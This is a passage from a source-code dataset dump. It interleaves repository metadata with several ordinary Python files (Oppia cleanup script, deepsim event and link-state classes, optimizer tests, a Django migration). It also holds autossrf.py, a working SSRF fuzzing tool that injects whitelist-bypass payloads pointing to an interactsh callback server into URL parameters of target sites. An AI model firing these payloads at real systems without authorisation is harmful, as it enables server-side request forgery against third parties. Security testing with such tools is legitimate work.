def show(scheme, backend="mpl"):
helpers.backend_to_function[backend](
scheme.points, scheme.weights, volume=8 * numpy.pi, edges=[]
)
return
| true
| true
|
f70b478d5085a5ad29d7c5f1433e9a5dcace1aa8
| 488
|
py
|
Python
|
bark/runtime/scenario/scenario_generation/config_readers/__init__.py
|
GAIL-4-BARK/bark
|
1cfda9ba6e9ec5318fbf01af6b67c242081b516e
|
[
"MIT"
] | null | null | null |
bark/runtime/scenario/scenario_generation/config_readers/__init__.py
|
GAIL-4-BARK/bark
|
1cfda9ba6e9ec5318fbf01af6b67c242081b516e
|
[
"MIT"
] | null | null | null |
bark/runtime/scenario/scenario_generation/config_readers/__init__.py
|
GAIL-4-BARK/bark
|
1cfda9ba6e9ec5318fbf01af6b67c242081b516e
|
[
"MIT"
] | 1
|
2020-08-12T17:09:05.000Z
|
2020-08-12T17:09:05.000Z
|
# Copyright (c) 2020 Julian Bernhard, Klemens Esterle, Patrick Hart and
# Tobias Kessler
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
from .agent_state_geometry_config_readers import *
from .behavior_model_config_readers import *
from .controlled_agents_config_readers import *
from .dynamic_model_config_readers import *
from .execution_model_config_readers import *
from .goal_definition_config_readers import *
| 40.666667
| 71
| 0.817623
|
from .agent_state_geometry_config_readers import *
from .behavior_model_config_readers import *
from .controlled_agents_config_readers import *
from .dynamic_model_config_readers import *
from .execution_model_config_readers import *
from .goal_definition_config_readers import *
| true
| true
|
f70b487dbf13fd67d8c1b8771e80901c74c097de
| 2,633
|
py
|
Python
|
scripts/clean.py
|
aman-roy/oppia
|
0e7066829b59bf6ce4b15c4723fe0398721cfd1a
|
[
"Apache-2.0"
] | 2
|
2019-12-02T18:56:49.000Z
|
2020-03-14T17:14:15.000Z
|
scripts/clean.py
|
aman-roy/oppia
|
0e7066829b59bf6ce4b15c4723fe0398721cfd1a
|
[
"Apache-2.0"
] | 2
|
2019-09-11T23:11:48.000Z
|
2019-11-29T06:04:52.000Z
|
scripts/clean.py
|
aman-roy/oppia
|
0e7066829b59bf6ce4b15c4723fe0398721cfd1a
|
[
"Apache-2.0"
] | 2
|
2019-12-02T18:56:56.000Z
|
2020-03-16T08:03:45.000Z
|
# Copyright 2019 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Deletes temporary and installed files."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import argparse
import os
import shutil
import python_utils
CURR_DIR = os.path.abspath(os.getcwd())
OPPIA_TOOLS_DIR = os.path.join(CURR_DIR, '..', 'oppia_tools')
_PARSER = argparse.ArgumentParser(description="""
Deletes temporary and installed files.
""")
def delete_directory_tree(directory_path):
"""Recursively delete an existing directory tree. Does not do anything if
directory does not exists.
Args:
directory_path: str. Directory path to be deleted.
"""
if not os.path.exists(directory_path):
return
shutil.rmtree(directory_path)
def delete_file(filepath):
"""Delete an existing file. Does not do anything if file does not exists.
Args:
filepath: str. Filepath to be deleted.
"""
if not os.path.isfile(filepath):
return
os.remove(filepath)
def main(args=None):
"""Runs the script to clean temporary and installed files."""
unused_parsed_args = _PARSER.parse_args(args=args)
delete_directory_tree(OPPIA_TOOLS_DIR)
delete_directory_tree('node_modules/')
delete_directory_tree('third_party/')
delete_directory_tree('build/')
delete_directory_tree('backend_prod_files/')
delete_file('.coverage')
delete_directory_tree('local_compiled_js/')
delete_directory_tree('local_compiled_js_for_test/')
delete_file('tsc_output_log.txt')
delete_file('dev_output.txt')
delete_file('.viminfo')
for filename in os.listdir(CURR_DIR):
if filename.startswith('tmpcompiledjs'):
delete_directory_tree(filename)
python_utils.PRINT('Temporary and installed files deleted')
# The 'no coverage' pragma is used as this line is un-testable. This is because
# it will only be called when clean.py is used as a script.
if __name__ == '__main__': # pragma: no cover
main()
| 31.345238
| 79
| 0.734523
|
from __future__ import absolute_import
from __future__ import unicode_literals
import argparse
import os
import shutil
import python_utils
CURR_DIR = os.path.abspath(os.getcwd())
OPPIA_TOOLS_DIR = os.path.join(CURR_DIR, '..', 'oppia_tools')
_PARSER = argparse.ArgumentParser(description="""
Deletes temporary and installed files.
""")
def delete_directory_tree(directory_path):
if not os.path.exists(directory_path):
return
shutil.rmtree(directory_path)
def delete_file(filepath):
if not os.path.isfile(filepath):
return
os.remove(filepath)
def main(args=None):
unused_parsed_args = _PARSER.parse_args(args=args)
delete_directory_tree(OPPIA_TOOLS_DIR)
delete_directory_tree('node_modules/')
delete_directory_tree('third_party/')
delete_directory_tree('build/')
delete_directory_tree('backend_prod_files/')
delete_file('.coverage')
delete_directory_tree('local_compiled_js/')
delete_directory_tree('local_compiled_js_for_test/')
delete_file('tsc_output_log.txt')
delete_file('dev_output.txt')
delete_file('.viminfo')
for filename in os.listdir(CURR_DIR):
if filename.startswith('tmpcompiledjs'):
delete_directory_tree(filename)
python_utils.PRINT('Temporary and installed files deleted')
if __name__ == '__main__':
main()
| true
| true
|
f70b4945227d811eedda76780bd668eab187029e
| 2,622
|
py
|
Python
|
model_measuring/kamal/core/engine/events.py
|
Gouzhong1223/Dubhe
|
8959a51704410dc38b595a0926646b9928451c9a
|
[
"Apache-2.0"
] | 1
|
2022-01-11T07:14:37.000Z
|
2022-01-11T07:14:37.000Z
|
model_measuring/kamal/core/engine/events.py
|
Gouzhong1223/Dubhe
|
8959a51704410dc38b595a0926646b9928451c9a
|
[
"Apache-2.0"
] | 1
|
2022-03-04T07:19:43.000Z
|
2022-03-04T07:19:43.000Z
|
model_measuring/kamal/core/engine/events.py
|
Gouzhong1223/Dubhe
|
8959a51704410dc38b595a0926646b9928451c9a
|
[
"Apache-2.0"
] | 1
|
2022-03-20T13:09:14.000Z
|
2022-03-20T13:09:14.000Z
|
"""
Copyright 2020 Tianshu AI Platform. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=============================================================
"""
from typing import Callable, Optional
from enum import Enum
class Event(object):
def __init__(self, value: str, event_trigger: Optional[Callable]=None ):
if event_trigger is None:
event_trigger = Event.default_trigger
self._trigger = event_trigger
self._name_ = self._value_ = value
@property
def trigger(self):
return self._trigger
@property
def name(self):
"""The name of the Enum member."""
return self._name_
@property
def value(self):
"""The value of the Enum member."""
return self._value_
@staticmethod
def default_trigger(engine):
return True
@staticmethod
def once_trigger():
is_triggered = False
        def wrapper(engine):
            nonlocal is_triggered  # without this, the assignment below makes is_triggered local and the first read raises UnboundLocalError
            if is_triggered:
                return False
            is_triggered = True
            return True
return wrapper
@staticmethod
def every_trigger(every: int):
def wrapper(engine):
return every>0 and (engine.state.iter % every)==0
return wrapper
def __call__(self, every: Optional[int]=None, once: Optional[bool]=None ):
if every is not None:
assert once is None
return Event(self.value, event_trigger=Event.every_trigger(every) )
if once is not None:
return Event(self.value, event_trigger=Event.once_trigger() )
return Event(self.value)
def __hash__(self):
return hash(self._name_)
def __eq__(self, other):
if hasattr(other, 'value'):
return self.value==other.value
        else:
            return NotImplemented
class DefaultEvents(Event, Enum):
BEFORE_RUN = "before_train"
AFTER_RUN = "after_train"
BEFORE_EPOCH = "before_epoch"
AFTER_EPOCH = "after_epoch"
BEFORE_STEP = "before_step"
AFTER_STEP = "after_step"
BEFORE_GET_BATCH = "before_get_batch"
AFTER_GET_BATCH = "after_get_batch"
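# Illustrative usage sketch (assumes an engine whose state tracks `iter`,
# which is what every_trigger reads):
#   ev_periodic = DefaultEvents.AFTER_STEP(every=10)  # fires on every 10th iteration
#   ev_single = DefaultEvents.BEFORE_RUN(once=True)   # fires exactly once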
| 28.5
| 79
| 0.637681
|
from typing import Callable, Optional
from enum import Enum
class Event(object):
def __init__(self, value: str, event_trigger: Optional[Callable]=None ):
if event_trigger is None:
event_trigger = Event.default_trigger
self._trigger = event_trigger
self._name_ = self._value_ = value
@property
def trigger(self):
return self._trigger
@property
def name(self):
return self._name_
@property
def value(self):
return self._value_
@staticmethod
def default_trigger(engine):
return True
@staticmethod
def once_trigger():
is_triggered = False
        def wrapper(engine):
            nonlocal is_triggered
            if is_triggered:
                return False
            is_triggered = True
            return True
return wrapper
@staticmethod
def every_trigger(every: int):
def wrapper(engine):
return every>0 and (engine.state.iter % every)==0
return wrapper
def __call__(self, every: Optional[int]=None, once: Optional[bool]=None ):
if every is not None:
assert once is None
return Event(self.value, event_trigger=Event.every_trigger(every) )
if once is not None:
return Event(self.value, event_trigger=Event.once_trigger() )
return Event(self.value)
def __hash__(self):
return hash(self._name_)
def __eq__(self, other):
if hasattr(other, 'value'):
return self.value==other.value
        else:
            return NotImplemented
class DefaultEvents(Event, Enum):
BEFORE_RUN = "before_train"
AFTER_RUN = "after_train"
BEFORE_EPOCH = "before_epoch"
AFTER_EPOCH = "after_epoch"
BEFORE_STEP = "before_step"
AFTER_STEP = "after_step"
BEFORE_GET_BATCH = "before_get_batch"
AFTER_GET_BATCH = "after_get_batch"
| true
| true
|
f70b494729d59f0ef0996b3eb8e1b49262383183
| 773
|
py
|
Python
|
scripts/run_pipeline.py
|
VIDA-NYU/alphad3m
|
db40193a448300d87442c451f9da17fa5cb845fd
|
[
"Apache-2.0"
] | null | null | null |
scripts/run_pipeline.py
|
VIDA-NYU/alphad3m
|
db40193a448300d87442c451f9da17fa5cb845fd
|
[
"Apache-2.0"
] | null | null | null |
scripts/run_pipeline.py
|
VIDA-NYU/alphad3m
|
db40193a448300d87442c451f9da17fa5cb845fd
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
import json
import os
import sys
import uuid
from alphad3m.automl import AutoML
if __name__ == '__main__':
if len(sys.argv) != 3:
sys.stderr.write('Usage: %s <config> <pipeline_uuid>\n' % sys.argv[0])
sys.exit(1)
with open(sys.argv[1]) as config_file:
config = json.load(config_file)
storage = config['temp_storage_root']
ta2 = AutoML(storage_root=storage,
pipelines_considered=os.path.join(storage, 'pipelines_considered'),
executables_root=os.path.join(storage, 'executables'))
result = ta2.run_pipeline(uuid.UUID(hex=sys.argv[2]),
config['training_data_root'],
config['problem_root'])
print(result)
| 28.62963
| 84
| 0.615783
|
import json
import os
import sys
import uuid
from alphad3m.automl import AutoML
if __name__ == '__main__':
if len(sys.argv) != 3:
sys.stderr.write('Usage: %s <config> <pipeline_uuid>\n' % sys.argv[0])
sys.exit(1)
with open(sys.argv[1]) as config_file:
config = json.load(config_file)
storage = config['temp_storage_root']
ta2 = AutoML(storage_root=storage,
pipelines_considered=os.path.join(storage, 'pipelines_considered'),
executables_root=os.path.join(storage, 'executables'))
result = ta2.run_pipeline(uuid.UUID(hex=sys.argv[2]),
config['training_data_root'],
config['problem_root'])
print(result)
| true
| true
|
f70b4ab8b24b3c82f5dfd1e583d98ca16d2fb009
| 2,358
|
py
|
Python
|
tests/optim_test.py
|
liutongyu0304/smartnet
|
6c720165d3222366864163b39f0e2ba7db64253f
|
[
"BSD-3-Clause"
] | null | null | null |
tests/optim_test.py
|
liutongyu0304/smartnet
|
6c720165d3222366864163b39f0e2ba7db64253f
|
[
"BSD-3-Clause"
] | null | null | null |
tests/optim_test.py
|
liutongyu0304/smartnet
|
6c720165d3222366864163b39f0e2ba7db64253f
|
[
"BSD-3-Clause"
] | null | null | null |
# coding=utf-8
from smartnet.optims import *
from smartnet.layers import *
import smartnet as sn
import unittest
class OptimTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
@classmethod
def setUpClass(cls):
print("optim test begins.")
@classmethod
def tearDownClass(cls):
print("optim test finished.")
@staticmethod
def test_sgd():
x = sn.random((30, 3))
w = sn.ones((3, 1))
y = sn.matmul(x, w)
linear = LinearLayer(3, 1, has_bias=False)
opt = SGDOptim(linear.named_parameters())
loss = MSELayer()
for i in range(1000):
opt.zero_grad()
y_hat = linear(x)
l = loss(y_hat, y)
l.backward()
opt.step()
print("sgd:", linear.named_parameters())
@staticmethod
def test_momentum():
x = sn.random((30, 3))
w = sn.ones((3, 1))
y = sn.matmul(x, w)
linear = LinearLayer(3, 1, has_bias=False)
opt = MomentumOptim(linear.named_parameters(), lr=0.001)
loss = MSELayer()
for i in range(1000):
opt.zero_grad()
y_hat = linear(x)
l = loss(y_hat, y)
l.backward()
opt.step()
print("momentum:", linear.named_parameters())
@staticmethod
def test_rmsprop():
x = sn.random((30, 3))
w = sn.ones((3, 1))
y = sn.matmul(x, w)
linear = LinearLayer(3, 1, has_bias=False)
opt = RMSPropOptim(linear.named_parameters())
loss = MSELayer()
for i in range(1000):
opt.zero_grad()
y_hat = linear(x)
l = loss(y_hat, y)
l.backward()
opt.step()
print("rmsprop:", linear.named_parameters())
@staticmethod
def test_adam():
x = sn.random((30, 3))
w = sn.ones((3, 1))
y = sn.matmul(x, w)
linear = LinearLayer(3, 1, has_bias=False)
opt = AdamOptim(linear.named_parameters())
loss = MSELayer()
for i in range(1000):
opt.zero_grad()
y_hat = linear(x)
l = loss(y_hat, y)
l.backward()
opt.step()
print("adam:", linear.named_parameters())
if __name__ == "__main__":
unittest.main()
| 24.309278
| 64
| 0.522477
|
from smartnet.optims import *
from smartnet.layers import *
import smartnet as sn
import unittest
class OptimTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
@classmethod
def setUpClass(cls):
print("optim test begins.")
@classmethod
def tearDownClass(cls):
print("optim test finished.")
@staticmethod
def test_sgd():
x = sn.random((30, 3))
w = sn.ones((3, 1))
y = sn.matmul(x, w)
linear = LinearLayer(3, 1, has_bias=False)
opt = SGDOptim(linear.named_parameters())
loss = MSELayer()
for i in range(1000):
opt.zero_grad()
y_hat = linear(x)
l = loss(y_hat, y)
l.backward()
opt.step()
print("sgd:", linear.named_parameters())
@staticmethod
def test_momentum():
x = sn.random((30, 3))
w = sn.ones((3, 1))
y = sn.matmul(x, w)
linear = LinearLayer(3, 1, has_bias=False)
opt = MomentumOptim(linear.named_parameters(), lr=0.001)
loss = MSELayer()
for i in range(1000):
opt.zero_grad()
y_hat = linear(x)
l = loss(y_hat, y)
l.backward()
opt.step()
print("momentum:", linear.named_parameters())
@staticmethod
def test_rmsprop():
x = sn.random((30, 3))
w = sn.ones((3, 1))
y = sn.matmul(x, w)
linear = LinearLayer(3, 1, has_bias=False)
opt = RMSPropOptim(linear.named_parameters())
loss = MSELayer()
for i in range(1000):
opt.zero_grad()
y_hat = linear(x)
l = loss(y_hat, y)
l.backward()
opt.step()
print("rmsprop:", linear.named_parameters())
@staticmethod
def test_adam():
x = sn.random((30, 3))
w = sn.ones((3, 1))
y = sn.matmul(x, w)
linear = LinearLayer(3, 1, has_bias=False)
opt = AdamOptim(linear.named_parameters())
loss = MSELayer()
for i in range(1000):
opt.zero_grad()
y_hat = linear(x)
l = loss(y_hat, y)
l.backward()
opt.step()
print("adam:", linear.named_parameters())
if __name__ == "__main__":
unittest.main()
| true
| true
|
f70b4acf7cbf3a28a8bfb59275fed813316b0317
| 709
|
py
|
Python
|
app/users/migrations/0007_auto_20190803_0831.py
|
S3Infosoft/mvr-insights
|
ac73feff03c1592d5efd8e0b82f72dd4dbd3e921
|
[
"MIT"
] | null | null | null |
app/users/migrations/0007_auto_20190803_0831.py
|
S3Infosoft/mvr-insights
|
ac73feff03c1592d5efd8e0b82f72dd4dbd3e921
|
[
"MIT"
] | 20
|
2019-06-17T11:01:25.000Z
|
2020-05-09T06:13:17.000Z
|
app/users/migrations/0007_auto_20190803_0831.py
|
S3Infosoft/mvr-insights
|
ac73feff03c1592d5efd8e0b82f72dd4dbd3e921
|
[
"MIT"
] | 1
|
2020-03-03T11:13:57.000Z
|
2020-03-03T11:13:57.000Z
|
# Generated by Django 2.2.4 on 2019-08-03 08:31
from django.db import migrations, models
import users.models
class Migration(migrations.Migration):
dependencies = [
('users', '0006_auto_20190803_0830'),
]
operations = [
migrations.AlterField(
model_name='customuser',
name='_image',
field=models.ImageField(blank=True, null=True, upload_to=users.models.save_image, verbose_name='image'),
),
migrations.AlterField(
model_name='customuser',
name='_image_thumb',
field=models.ImageField(blank=True, null=True, upload_to=users.models.save_thumb, verbose_name='image_thumb'),
),
]
| 28.36
| 122
| 0.634697
|
from django.db import migrations, models
import users.models
class Migration(migrations.Migration):
dependencies = [
('users', '0006_auto_20190803_0830'),
]
operations = [
migrations.AlterField(
model_name='customuser',
name='_image',
field=models.ImageField(blank=True, null=True, upload_to=users.models.save_image, verbose_name='image'),
),
migrations.AlterField(
model_name='customuser',
name='_image_thumb',
field=models.ImageField(blank=True, null=True, upload_to=users.models.save_thumb, verbose_name='image_thumb'),
),
]
| true
| true
|
f70b4d49fd7c2428414fde8a0fcb3a392c5d7289
| 7,023
|
py
|
Python
|
deepsim/deepsim/core/link_state.py
|
aws-deepracer/deepsim
|
cad2639f525c2f94ec5c03d8b855cc65b0b8ee55
|
[
"Apache-2.0"
] | 1
|
2022-03-25T07:20:49.000Z
|
2022-03-25T07:20:49.000Z
|
deepsim/deepsim/core/link_state.py
|
aws-deepracer/deepsim
|
cad2639f525c2f94ec5c03d8b855cc65b0b8ee55
|
[
"Apache-2.0"
] | null | null | null |
deepsim/deepsim/core/link_state.py
|
aws-deepracer/deepsim
|
cad2639f525c2f94ec5c03d8b855cc65b0b8ee55
|
[
"Apache-2.0"
] | null | null | null |
#################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). #
# You may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#################################################################################
"""A class for link state."""
from typing import Optional
from deepsim.core.pose import Pose
from deepsim.core.twist import Twist
from gazebo_msgs.msg import LinkState as ROSLinkState
class LinkState:
"""
LinkState class
"""
def __init__(self,
link_name: Optional[str] = None,
pose: Optional[Pose] = None,
twist: Optional[Twist] = None,
reference_frame: Optional[str] = None):
"""
Initialize LinkState class
Args:
link_name (Optional[str]): link name
pose (Optional[Pose]): desired pose in reference frame
twist (Optional[Twist]): desired twist in reference frame
reference_frame (Optional[str]): set pose/twist relative to the frame of this entity (Body/Model)
leave empty or "world" or "map" defaults to world-frame
"""
self._link_name = link_name
self._pose = pose.copy() if pose else Pose()
self._twist = twist.copy() if twist else Twist()
self._reference_frame = reference_frame or ''
@property
def link_name(self) -> str:
"""
Returns the link name
Returns:
str: link name
"""
return self._link_name
@link_name.setter
def link_name(self, value: str) -> None:
"""
Set link name
Args:
value (str): link name
"""
self._link_name = value
@property
def pose(self) -> Pose:
"""
Returns the copy of pose.
Returns:
Pose: the copy of pose of the link
"""
return self._pose.copy()
@pose.setter
def pose(self, value: Pose) -> None:
"""
Set the pose.
Args:
value (Pose): the pose
"""
self._pose = value.copy()
@property
def twist(self) -> Twist:
"""
Return the copy of twist.
Returns:
Twist: the copy of twist
"""
return self._twist.copy()
@twist.setter
def twist(self, value: Twist) -> None:
"""
Set the twist.
Args:
value (Twist): the twist
"""
self._twist = value.copy()
@property
def reference_frame(self) -> str:
"""
Returns the reference frame
Returns:
str: the reference frame
"""
return self._reference_frame
@reference_frame.setter
def reference_frame(self, value: str) -> None:
"""
Set the reference frame
Args:
value (str): the reference frame
"""
self._reference_frame = value
def to_ros(self) -> ROSLinkState:
"""
Return the ROS LinkState object created from this link state.
Returns:
gazebo_msgs.msg.LinkState: ROS LinkState
"""
ros_link_state = ROSLinkState()
if self.link_name:
ros_link_state.link_name = self.link_name
if self._pose:
ros_link_state.pose = self._pose.to_ros()
if self._twist:
ros_link_state.twist = self._twist.to_ros()
if self.reference_frame:
ros_link_state.reference_frame = self.reference_frame
return ros_link_state
@staticmethod
def from_ros(value: ROSLinkState) -> 'LinkState':
"""
Returns new LinkState object created from ROS LinkState
Args:
value (ROSLinkState): ROS LinkState
Returns:
LinkState: new LinkState object created from ROS LinkState
"""
return LinkState(link_name=value.link_name,
pose=Pose.from_ros(value.pose),
twist=Twist.from_ros(value.twist),
reference_frame=value.reference_frame)
def copy(self) -> 'LinkState':
"""
Returns a copy.
Returns:
LinkState: the copied link state
"""
return LinkState(link_name=self.link_name,
pose=self._pose,
twist=self._twist,
reference_frame=self.reference_frame)
def __eq__(self, other: 'LinkState') -> bool:
"""
Equality of LinkState.
Args:
other (LinkState): other to compare
Returns:
bool: True if the differences of all components are within epsilon, Otherwise False.
"""
return (self.link_name == other.link_name and self.reference_frame == other.reference_frame
and self._pose == other._pose and self._twist == other._twist)
def __ne__(self, other: 'LinkState') -> bool:
"""
        Inequality of LinkState.
Args:
other (LinkState): other to compare
Returns:
bool: False if the differences of all components are within epsilon, Otherwise True.
"""
return not self.__eq__(other)
def __str__(self) -> str:
"""
String representation of a link state
Returns:
str: String representation of a link state
"""
return "(link_name=%s, pose=%s, twist=%s, reference_frame=%s)" % (self.link_name,
repr(self._pose),
repr(self._twist),
self.reference_frame)
def __repr__(self) -> str:
"""
String representation including class
Returns:
str: String representation including class
"""
return "LinkState" + str(self)
| 31.922727
| 109
| 0.508472
| true
| true
|
|
f70b4e07bb9dc2e5dc2154f42b695e18f69be121
| 8,395
|
py
|
Python
|
autossrf.py
|
Th0h0/autossrf
|
17125339c395ffaef7d6a58ba234fad53d172885
|
[
"MIT"
] | null | null | null |
autossrf.py
|
Th0h0/autossrf
|
17125339c395ffaef7d6a58ba234fad53d172885
|
[
"MIT"
] | null | null | null |
autossrf.py
|
Th0h0/autossrf
|
17125339c395ffaef7d6a58ba234fad53d172885
|
[
"MIT"
] | 1
|
2022-03-26T14:21:59.000Z
|
2022-03-26T14:21:59.000Z
|
import regex
import argparse
import requests
import time
import os
import threading
import random
execPath = os.getcwd()
currentPath = os.path.dirname(__file__)
os.chdir(currentPath)
FUZZ_PLACE_HOLDER = '??????'
TIMEOUT_DELAY = 5
LOCK = threading.Lock()
parser = argparse.ArgumentParser()
parser.add_argument("--file", "-f", type=str, required=False, help= 'file of all URLs to be tested against SSRF')
parser.add_argument("--url", "-u", type=str, required=False, help= 'url to be tested against SSRF')
parser.add_argument("--threads", "-n", type=int, required=False, help= 'number of threads for the tool')
parser.add_argument("--output", "-o", type=str, required=False, help='output file path')
parser.add_argument("--oneshot", "-t", action='store_true', help='fuzz with only one basic payload - to be activated in case of time constraints')
parser.add_argument("--verbose", "-v", action='store_true', help='activate verbose mode')
args = parser.parse_args()
if not (args.file or args.url):
parser.error('No input selected: Please add --file or --url as arguments.')
if not os.path.isdir('output'):
os.system("mkdir output")
if not os.path.isdir('output/threadsLogs'):
os.system("mkdir output/threadsLogs")
else:
os.system("rm -r output/threadsLogs")
os.system("mkdir output/threadsLogs")
if args.output:
outputFile = open(f"{execPath}/{args.output}", "a")
else:
outputFile = open("output/ssrf-result.txt", "a")
if args.file:
allURLs = [line.replace('\n', '') for line in open(f"{execPath}/{args.file}", "r")]
regexParams = regex.compile('(?<=(access|dbg|debug|edit|grant|clone|exec|execute|load|make|modify|reset|shell|toggle|adm|root|cfg|dest|redirect|uri|path|continue|url|window|next|data|site|html|validate|domain|callback|return|host|port|to|out|view|dir|show|navigation|open|file|document|folder|pg|php_path|doc|img|filename|file_name|image)=)(.*)(?=(&|$))', flags=regex.IGNORECASE)
extractInteractionServerURL = "(?<=] )([a-z0-9][a-z0-9][a-z0-9].*)"
def getFileSize(fileID):
interactionLogs = open(f"output/threadsLogs/interaction-logs{fileID}.txt", "r")
return len(interactionLogs.read())
def getInteractionServer():
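    # Launches interactsh-client in the background, logging to a per-run file,
    # then polls that file until the interaction server URL appears in it.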
id = random.randint(0, 999999)
os.system(f"interactsh-client -pi 1 &> output/threadsLogs/interaction-logs{id}.txt &")
time.sleep(2)
interactionServer = None
while not interactionServer:
interactionLogs = open(f"output/threadsLogs/interaction-logs{id}.txt", "r")
fileContent = interactionLogs.read()
pastInteractionLogsSize = len(fileContent)
interactionServer = regex.search(extractInteractionServerURL, fileContent)
time.sleep(2)
interactionServer = interactionServer.group()
return interactionServer, id
def exception_verbose_message(exceptionType):
if args.verbose:
if exceptionType == "timeout":
print("\nTimeout detected... URL skipped")
elif exceptionType == "redirects":
print("\nToo many redirects... URL skipped")
elif exceptionType == "others":
print("\nRequest error... URL skipped")
def splitURLS(threadsSize): #Multithreading
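    # Splits allURLs into one roughly equal chunk per thread; the tail branch
    # folds any remainder into the final chunk(s) so no URL is dropped.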
splitted = []
URLSsize = len(allURLs)
width = int(URLSsize/threadsSize)
if width == 0:
width = 1
endVal = 0
i = 0
while endVal != URLSsize:
if URLSsize <= i + 2 * width:
if len(splitted) == threadsSize - 2:
endVal = int(i + (URLSsize - i)/2)
else:
endVal = URLSsize
else:
endVal = i + width
splitted.append(allURLs[i: endVal])
i += width
return splitted
def generatePayloads(whitelistedHost, interactionHost):
generated =[
f"http://{interactionHost}",
f"//{interactionHost}",
f"http://{whitelistedHost}.{interactionHost}", # whitelisted.attacker.com
f"http://{interactionHost}?{whitelistedHost}",
f"http://{interactionHost}/{whitelistedHost}",
f"http://{interactionHost}%ff@{whitelistedHost}",
f"http://{interactionHost}%ff.{whitelistedHost}",
f"http://{whitelistedHost}%25253F@{interactionHost}",
f"http://{whitelistedHost}%253F@{interactionHost}",
f"http://{whitelistedHost}%3F@{interactionHost}",
f"http://{whitelistedHost}@{interactionHost}",
f"http://foo@{interactionHost}:80@{whitelistedHost}",
f"http://foo@{interactionHost}%20@{whitelistedHost}",
f"http://foo@{interactionHost}%09@{whitelistedHost}"
]
return generated
def smart_extract_host(url, matchedElement):
urlDecodedElem = requests.utils.unquote(matchedElement)
    hostExtractorRegex = r'(?<=(https|http):\/\/)(.*?)(?=\/)'  # raw string avoids invalid-escape warnings
extractedHost = regex.search(hostExtractorRegex, urlDecodedElem)
if not extractedHost:
extractedHost = regex.search(hostExtractorRegex, url)
return extractedHost.group()
def prepare_url_with_regex(url):
replacedURL = regexParams.sub(FUZZ_PLACE_HOLDER, url)
matchedElem = regexParams.search(url)
if matchedElem:
matchedElem = matchedElem.group()
return replacedURL, matchedElem
def fuzz_SSRF(url, interactionServer, fileID):
pastInteractionLogsSize = getFileSize(fileID)
replacedURL, matchedElem = prepare_url_with_regex(url)
if not matchedElem: #No relevant parameter matching
return
if args.oneshot:
payloadsList = [f"http://{interactionServer}"]
else:
host = smart_extract_host(url, matchedElem)
payloadsList = generatePayloads(host, interactionServer)
if args.verbose:
if not args.threads:
print(f" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +")
print(f"\nStarting fuzzing {replacedURL}")
for payload in payloadsList:
fuzz_and_detect_with_payload("FUZZ", replacedURL, payload, fileID)
time.sleep(2)
if isInteractionDetected(pastInteractionLogsSize, fileID):
if args.verbose:
print(f"\nSSRF identified in {replacedURL}. Determining valid payload ...")
for payload in payloadsList:
if fuzz_and_detect_with_payload("DETECT", replacedURL, payload, fileID):
print(f"SSRF detected in {replacedURL} with payload {payload}.")
with LOCK:
outputFile.write(f"SSRF detected in {replacedURL} with payload {payload}\n")
return
else:
if args.verbose:
print(f"\nNothing detected for {replacedURL}")
def fuzz_and_detect_with_payload(type ,url, payload, fileID):
pastInteractionLogsSize = getFileSize(fileID)
fuzzedUrl = url.replace(FUZZ_PLACE_HOLDER, payload)
if args.verbose:
if not args.threads:
print(f"Testing payload: {payload} ", end="\r")
requests.get(fuzzedUrl, timeout=TIMEOUT_DELAY)
if type == "DETECT":
time.sleep(2)
return isInteractionDetected(pastInteractionLogsSize, fileID)
def isInteractionDetected(pastInteractionLogsSize, fileID):
currentInteractionLogsSize = getFileSize(fileID)
if currentInteractionLogsSize != pastInteractionLogsSize:
return True
return False
def sequential_url_scan(urlList):
interactionServer, fileID = getInteractionServer()
for url in urlList:
try:
fuzz_SSRF(url, interactionServer, fileID)
except requests.exceptions.Timeout:
exception_verbose_message("timeout")
except requests.exceptions.TooManyRedirects:
exception_verbose_message("redirects")
except Exception as e: #requests.exceptions.RequestException:
print(f"{url} : {e}")
exception_verbose_message("others")
def main():
if args.url:
try:
sequential_url_scan([args.url])
except Exception as e:
print("\nInvalid URL")
elif args.file:
if not args.threads or args.threads == 1:
sequential_url_scan(allURLs)
else:
workingThreads = []
split = splitURLS(args.threads)
for subList in split:
t = threading.Thread(target=sequential_url_scan, args=[subList])
t.start()
workingThreads.append(t)
for thread in workingThreads:
thread.join()
outputFile.close()
if __name__ == '__main__':
main()
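# Illustrative invocation sketch (file names are hypothetical; requires
# interactsh-client to be installed and on PATH):
#   python3 autossrf.py --file urls.txt --threads 10 --output results.txt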
| 34.690083
| 379
| 0.657177
|
import regex
import argparse
import requests
import time
import os
import threading
import random
execPath = os.getcwd()
currentPath = os.path.dirname(__file__)
os.chdir(currentPath)
FUZZ_PLACE_HOLDER = '??????'
TIMEOUT_DELAY = 5
LOCK = threading.Lock()
parser = argparse.ArgumentParser()
parser.add_argument("--file", "-f", type=str, required=False, help= 'file of all URLs to be tested against SSRF')
parser.add_argument("--url", "-u", type=str, required=False, help= 'url to be tested against SSRF')
